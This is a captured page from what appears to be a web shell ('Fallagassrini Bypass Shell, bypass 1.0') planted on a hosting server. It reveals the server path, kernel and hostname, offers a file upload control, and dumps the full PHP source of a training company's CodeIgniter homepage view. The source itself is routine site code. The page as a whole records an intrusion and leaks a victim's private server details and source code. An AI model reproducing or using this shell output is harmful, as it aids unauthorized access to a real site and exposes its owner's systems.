? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/unova.in/test/application/views/site/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/unova.in/test/application/views/site/home.php

<?php
    $this->load->view('site/header');
?>
<script language="javascript" type="text/javascript" src="<?=base_url()?>/assets/js/jquery.totemticker.js"></script>
<script language="javascript" type="text/javascript" src="<?=base_url()?>/assets/js/fade-plugin.js"></script>
<!--<script language="javascript" type="text/javascript" src="<?=base_url()?>/assets/js/program/newscarousel.js"></script>
<script language="javascript" type="text/javascript" src="<?=base_url()?>/assets/js/program/jquery-1.5.min.js"></script>
<script language="javascript" type="text/javascript" src="<?=base_url()?>/assets/js/program/jquery.jcarousel.js"></script>-->

<link href="<?=base_url()?>/assets/css/programs.css" type="text/css" rel="stylesheet"/>
<script type="text/javascript">
$(function(){

      $('#vertical-ticker').totemticker({
				row_height	:	'118px',
				next		:	'#ticker-next',
				previous	:	'#ticker-previous',
				stop		:	'#stop',
				start		:	'#start',
				mousestop	:	true
			});

      $("#transition").fadeTransition({pauseTime: 2000,
                                                  transitionTime: 2000,
                                                  delayStart: 2000,
                                                  pauseOnMouseOver: true,
                                                  createNavButtons: true});

 
});
$(document).ready(function() {

	//rotation speed and timer
	var speed = 5000;
	var run = setInterval('rotate()', speed);

	//grab the width and calculate left value
	var item_width = $('#slides li').outerWidth();
	var left_value = item_width * (-1);

    //move the last item before first item, just in case user click prev button
	$('#slides li:first').before($('#slides li:last'));

	//set the default item to the correct position
	$('#slides ul').css({'left' : left_value});

    //if user clicked on prev button
	$('#prev').click(function() {

		//get the right position
		var left_indent = parseInt($('#slides ul').css('left')) + item_width;

		//slide the item
		$('#slides ul:not(:animated)').animate({'left' : left_indent}, 200,function(){

            //move the last item and put it as first item
			$('#slides li:first').before($('#slides li:last'));

			//set the default item to correct position
			$('#slides ul').css({'left' : left_value});

		});

		//cancel the link behavior
		return false;

	});


    //if user clicked on next button
	$('#next').click(function() {

		//get the right position
		var left_indent = parseInt($('#slides ul').css('left')) - item_width;

		//slide the item
		$('#slides ul:not(:animated)').animate({'left' : left_indent}, 200, function () {

            //move the first item and put it as last item
			$('#slides li:last').after($('#slides li:first'));

			//set the default item to correct position
			$('#slides ul').css({'left' : left_value});

		});

		//cancel the link behavior
		return false;

	});

	//if mouse hover, pause the auto rotation, otherwise rotate it
	$('#slides').hover(

		function() {
			clearInterval(run);
		},
		function() {
			run = setInterval('rotate()', speed);
		}
	);

});

//a simple function to click next link
//a timer will call this function, and the rotation will begin :)
function rotate() {
	$('#next').click();
}



</script>


               
                   <div class="banner">
                       
                       <div class="banner_top"></div><!--banner_top end-->
                       
                       <div class="banner_mid">
                           <object width="1027" height="280">
                            <param name="wmode" value="transparent"/>
                            <param name="movie" value="<?=base_url()?>/assets/images/banner.swf"/>
                            <embed wmode="transparent" quality="high" src="<?=base_url()?>/assets/images/banner.swf" width="1027" height="280"/>
                           </object>
                           
                       </div><!--banner_mid end-->
                       
                       <div class="banner_bot"></div><!--banner_bot end-->
                       
                       
                   </div><!--banner end-->
                   
                   <div class="content">
                       
                      <div class="content_left">
                          
                          
                          <div class="text_cont">
                          
                          <h1>Welcome to UNOVA</h1>
                          <p><b>U-Nova .... <i>the new</i> You!</b></p>
                          
                          <p>Shed your perceived limitations and glow with a new inner brilliance. UNOVA provides you with the means with which to
                              Transform and Empower yourself. Emerge as the New YOU. 
                          </p>
                          <p>
                              People are the differentiators, the ones who can take
                              a good company and turn it into a great company.
                          </p>
                          <p>
                              Take yourself and your people through the UNOVA experience and arm your company with the best weapons in the
                              marketplace – sharp, incisive, inspiring LEADERS. It is always the Leaders who galvanise the group into fierce action,
                              a productive frenzy, creating the will to win.
                          </p>

                          <p>
                              We will assist you to benefit from Neuro Linguistic Programming, Behavioural Skills and 
                              Transformational Leadership Training, MBTI, Six Thinking Hats, Public Speaking and Presentation Skills Training,
                              Sales and Marketing Training and tailor-made Coaching and Consultancy Services to meet your specific needs.
                          </p>
                          <p>We welcome you to the U-NOVA experience. Together, let us transform our world!</p>

                             
                            
                          </div>
                          <!--text_cont end-->
                      
                      
                      <div class="upcoming_prgms">
                          
                          <h2>Upcoming Programs</h2>
                          
                         <div class="upcoming-news">
                             <div id="news"> 
      
      <!-- Begin News Navigation -->
      <div id="newslist">
        <ul>
             <?php
                                  if ($programmes->num_rows() > 0)
                             {
                                 foreach ($programmes->result_array() as $program)
                                 {
                                 ?>
                                
                                <li>
                                         <div>
                               <h4><a href="<?=site_url();?>/site/event-registration/<?=$program['programme_id'];?>"><?=$program['programme_title'];?></a></h4>
                                <a href="<?=site_url();?>/site/event-registration/<?=$program['programme_id'];?>"><span class="register_link"><img src="<?=base_url()?>/assets/images/register.png" alt="Event Registration"/></span></a>
                                     <p><?=$program['second_line'];?></p>
                                     <p><?=$program['description'];?></p>
                                     <p><?=$program['third_line'];?></p>
                                          </div>

                                </li>
                                <?php
                                 }
                             }
                                 ?>
         
          
        </ul>
      </div>
      
      
      <div class="clearfix"></div>
    </div>

                              
</div>

                                                
                      </div>
                          </div><!--content_left end-->
                      
                       <div class="content_right"> 
                       
                       <div class="right_box_wrapper"> 
                           <div class="right_box">
                               
                           <div class="brouchure">
                            <a href="<?=base_url()?>/assets/resources/Brochure.pdf" target="_blank"><img src="<?=base_url()?>/assets/images/brochure.png" alt="Unova on Facebook"/></a>   
                           </div> 
                               
                           </div>  <br/><br/><br/>
                           
                           
                             <div class="right_box_news">

                               <h3>Quote of the Week</h3>

                               <div class="news_events">

                                      <ul>



                                   <li><?php echo $quote->quote_content; ?></li>



                               </ul>




                               </div><!--right_box end-->
                           </div><!--right_box end-->
                           <br/>
<!--                           <div class="right_box_gallery">

                               <h3>John Maxwell Workshops</h3>


                            <div id="carousel">

                                    

                                    <div class="clear"></div>

                                    <div id="slides">
                                            <ul>
                                                    <li><a target="_blank" href="<?=base_url()?>/assets/resources/How_To_Be_A_REAL_Success_Brochure.pdf"><img src="<?=base_url()?>/assets/images/books/2.jpg" width="200" height="240" alt="John Maxwel"/></a></li>
                                                    <li><a target="_blank" href="<?=base_url()?>/assets/resources/Leadership_Gold_Brochure.pdf"><img src="<?=base_url()?>/assets/images/books/1.jpg" width="200" height="240" alt="John Maxwel"/></a></li>
                                                    <li><a target="_blank" href="<?=base_url()?>/assets/resources/Put_Your_Dreams_To_The_Test_Brochure.pdf"><img src="<?=base_url()?>/assets/images/books/3.jpg" width="200" height="240" alt="John Maxwel"/></a></li>
                                                    <li><a target="_blank" href="<?=base_url()?>/assets/resources/Becoming_A_Person_Of_Influence_Brochure.pdf"><img src="<?=base_url()?>/assets/images/books/4.jpg" width="200" height="240" alt="John Maxwel"/></a></li>
                                                    <li><a target="_blank" href="<?=base_url()?>/assets/resources/Everyone_Communicates_Few_Connect_Brochure.pdf"><img src="<?=base_url()?>/assets/images/books/5.jpg" width="200" height="240" alt="John Maxwel"/></a></li>
                                            </ul>
                                            <div class="clear"></div>
                                    </div>
                                    <div id="buttons_area">
                                        <div id="buy_books">
                                            <a target="_blank" href="http://www.johnmaxwell.com/132287.html"> <img src= "<?=base_url()?>/assets/images/buy.png" alt="Buy John Maxwell"/></a>
                                        </div>
                                        <div id="buttons">
                                                <a href="#" id="prev">prev</a>
                                                <a href="#" id="next">next</a>
                                                <div class="clear"></div>
                                        </div>
                                    </div>

                                </div>

                           </div>-->
                          
                            <div class="right_box">
                            <div class="testimonils" id="transition">
                                <?php
                                  if ($testimonial->num_rows() > 0)
                             {
                                 foreach ($testimonial->result_array() as $test)
                                 {

                                 ?>
                               
                                 <div id="testimonials_container">
                                  <?php
                                  $limit=130;
                                  $summary=strip_tags($test['testimonial']);
                                  if (strlen($summary) > $limit)
                                  {
                                        $summary_new = substr($summary, 0, $limit)." ...";
                                  }
                                  else
                                      $summary_new=$summary;
                                  ?>
                                  <p id="testimonials_txt"><?=$summary_new?></p>
                                  <p id="read_more"><a  href="<?=site_url();?>/site/testimonials/">Read More>></a></p>
                                  <p id="testimonials_name"><?=$test['person']?></p>
                                  <?php
                                  $limit=65;
                                  $summarydesg=strip_tags($test['designation']);
                                  if (strlen($summarydesg) > $limit)
                                  {
                                        $summarydesg_new = substr($summarydesg, 0, $limit)." ...";
                                  }
                                  else
                                      $summarydesg_new=$summarydesg;
                                  ?>
                                  <p id="testimonials_department"><?=$summarydesg_new?></p>
                                  
                                   </div>
                                
                                <?php
                                 }
                             }
                                ?>
                           </div>
                            </div>
                             
                           
                       
                       </div><!--right_box_wrapper end-->
                       
                       </div><!--content_right end-->
                       
                       
                   </div><!--content end-->
                   
                   
                   <div class="footer">
                       
                          <div class="connect">

                               <div class="social_head"> connect with us</div>

                               <div class="social_icon">

                                   <a href="http://www.facebook.com/unova.thenewu" target="_blank"><img src="<?=base_url()?>/assets/images/facebook.png" alt="Unova on Facebook"/></a>

                                   <a href="http://twitter.com/unova_india" target="_blank"><img src="<?=base_url()?>/assets/images/twitter.png" alt="Unova on Twitter"/></a>

                                   <a href="http://www.linkedin.com/company/unova-training-&-consulting" target="_blank"><img src="<?=base_url()?>/assets/images/linkedin.png" alt="Unova on Linkedin"/></a>



                               </div>

                           </div><!--connect end--> 
                      
                           
                           
                           
                       </div><!--footer_right end-->
                       
                       
                   </div><!--footer end-->
                   
                   
                   
<?php
    $this->load->view('site/footer');
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net